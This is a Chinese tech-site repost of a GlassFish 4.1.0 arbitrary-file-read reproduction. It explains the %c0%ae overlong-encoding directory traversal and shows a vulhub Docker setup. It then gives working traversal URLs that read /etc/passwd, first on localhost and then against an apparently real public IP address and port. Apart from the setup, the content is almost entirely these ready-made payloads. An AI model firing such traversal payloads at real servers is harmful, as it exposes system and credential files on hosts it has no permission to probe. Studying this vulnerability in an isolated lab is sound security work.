栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

GlassFish 任意文件读取漏洞

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

GlassFish 任意文件读取漏洞

漏洞简介

glassfish是一款java编写的跨平台的开源的应用服务器。

java语言中会把%c0%ae解析为uC0AE,最后转义为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。

漏洞复现

这里使用4.1.0版本

使用vulhub

cd /vulhub/glassfish/4.1.0

(rootguiltyfet)-[/home/guiltyfet/vulhub/glassfish/4.1.0]
└─# docker-compose up -d
Creating network "410_default" with the default driver
Pulling glassfish (vulhub/glassfish:4.1)...
4.1: Pulling from vulhub/glassfish
c73ab1c6897b: Pull complete
1ab373b3deae: Pull complete
b542772b4177: Pull complete
57c8de432dbe: Pull complete
da44f64ae999: Pull complete
0bbc7b377a91: Pull complete
1b6c70b3786f: Pull complete
d9bbcf733166: Pull complete
b1d3e8de8ec6: Pull complete
f9b500de9875: Pull complete
ae2e4db4d935: Pull complete
Digest: sha256:45966fa41d1e16dc4dcc0d6dcb0e647396cf46cb554928ec8186b998d5fac8e9
Status: Downloaded newer image for vulhub/glassfish:4.1
Creating 410_glassfish_1 ... done

https://127.0.0.1:4848/

https://127.0.0.1:4848/theme/meta-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

http://101.230.222.122:9002/Config/index.php?f=…/…/…/…/…/…/etc/passwd

http://101.230.222.122:9002/Config/index.php?f=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
关闭镜像
docker-compose down

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/606600.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号